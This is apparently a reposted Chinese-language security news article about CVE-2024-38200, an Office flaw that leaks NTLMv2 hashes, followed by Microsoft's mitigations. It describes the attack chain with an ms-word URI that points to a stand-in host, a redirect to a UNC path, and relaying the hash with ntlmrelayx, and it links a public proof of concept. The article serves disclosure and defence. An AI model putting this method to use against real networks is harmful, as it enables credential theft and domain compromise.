发现的零日漏洞使 Microsoft Office 用户面临风险。安全研究员 Metin Yunus Kandemir 最近发布了技术细节和概念验证 (PoC) 漏洞,揭示了 Microsoft Office 中的关键信息泄露漏洞 (CVE-2024-38200)。此漏洞影响多个版本,包括 Office 2016、Office 2019、Office LTSC 2021 和 Microsoft 365 企业版应用,引起了安全专业人士的担忧,因为它为未经授权的行为者访问受保护的信息打开了大门。
CVE-2024-38200 利用 Microsoft Office 中的信息泄露漏洞,允许攻击者通过 HTTP 和 SMB 协议捕获敏感身份验证数据,例如 NTLMv2 哈希。该漏洞可以通过诱骗用户点击特制链接来启动,该链接指向托管在受感染或攻击者控制的网站上的恶意文档。一旦在易受攻击的 Office 版本中打开该文件,攻击者就可以捕获 NTLMv2 哈希,这是对域控制器发起 NTLM 中继攻击的关键要素。
微软的公告解释了基于网络的攻击场景:攻击者在受感染的网站上托管或注入精心制作的 Office 文件,并诱使受害者通过电子邮件或即时消息下载该文件。一旦受害者与该文件交互,恶意代码便可以通过网络捕获 NTLMv2 哈希并将 HTTP 请求重定向到攻击者控制的服务器。
该漏洞尤其危险,因为它绕过了 Microsoft 365 Office 和 Office 2019 中的某些安全机制。在 Office 2016 等早期版本中,安全警告可保护用户免受此类攻击。然而,在较新的版本中,攻击者可以在用户不知情的情况下利用此漏洞,从而使攻击者更容易获取敏感信息。
Kandemir 的攻击方法利用了 Office URI 方案,特别是 ms-word 命令。他的概念验证展示了如何通过 URL 访问远程文件(例如 ms-word:ofe|u|http://test.local:8080/leak/leak.docx),从而触发漏洞。通过使用 uncredirect.py 等工具将 Office HTTP 请求重定向到 UNC 路径,攻击者可以绕过安全限制并捕获 NTLMv2 哈希,从而实现进一步的攻击,例如 NTLM 中继。
Kandemir 研究的一个重要见解是,当用户与远程文件交互时,Office 2016 会显示安全警告,而 Microsoft 365 Office 和 Office 2019 却没有这样做,从而允许攻击者在不提醒用户的情况下进行攻击。
通过 HTTP 捕获的 NTLMv2 哈希通过 ntlmrelayx 中继到域控制器
在攻击链中,NTLMv2 哈希对于针对域控制器执行 NTLM 中继攻击至关重要。此攻击可用于验证合法用户身份或获取对网络资源的未经授权的访问权限。通过利用 Office 易受攻击的 URI 方案,攻击者可以将 HTTP 请求重定向到受控的 UNC 路径,其中响应服务器会捕获 NTLMv2 哈希,从而绕过 SMB 安全限制。
微软在2024 年 8 月的补丁星期二修复了CVE-2024-38200 漏洞,目前该漏洞已得到修补。但是,微软建议用户采取额外措施来减轻潜在的攻击,尤其是在无法立即应用补丁的情况下。
以下是阻止出站NTLM 流量的推荐缓解技术:
-
网络安全:限制 NTLM 策略:配置“限制 NTLM:向远程服务器发出 NTLM 流量”组策略。使用此设置可阻止 Windows 7、Windows Server 2008 及更高版本的 NTLM 流量。
-
受保护的用户安全组:将用户添加到受保护的用户安全组,限制使用 NTLM 作为身份验证方法。
-
阻止 TCP 端口 445:阻止出站流量到 TCP 端口 445,这是 NTLM 中继攻击的常见途径。
虽然这些方法是有效的,但微软警告说,依赖 NTLM 身份验证的合法服务可能会因阻止这些流量路由而受到破坏。
https://github.com/passtheticket/CVE-2024-38200
原文始发于微信公众号(独眼情报):【PoC】Microsoft Office 中的零日漏洞 CVE-2024-38200 暴露 NTLMv2 哈希PoC 发布
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论